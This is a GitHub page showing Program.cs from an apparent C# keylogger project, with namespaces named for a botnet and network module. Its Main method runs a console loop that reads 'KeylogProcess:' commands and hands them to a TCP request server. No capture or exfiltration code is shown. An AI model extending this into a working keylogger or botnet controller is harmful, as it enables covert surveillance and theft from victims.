-
Notifications
You must be signed in to change notification settings - Fork 0
/
Program.cs
42 lines (37 loc) · 1020 Bytes
/
Program.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
using KeyLoggerVersion1._0.botNet;
using KeyLoggerVersion1._0.Network;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace KeyLoggerVersion1._0
{
public class Program
{
#region Main
[STAThread]
private static void Main(string[] args)
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
string script = "";
do
{
Console.WriteLine();
Console.Write("KeylogProcess: "); script = Console.ReadLine();
TCPAcceptRequest.Instance.AcceptRequestServer(script);
}
while (script != "exit");
Console.ReadKey();
}
#endregion Main
}
}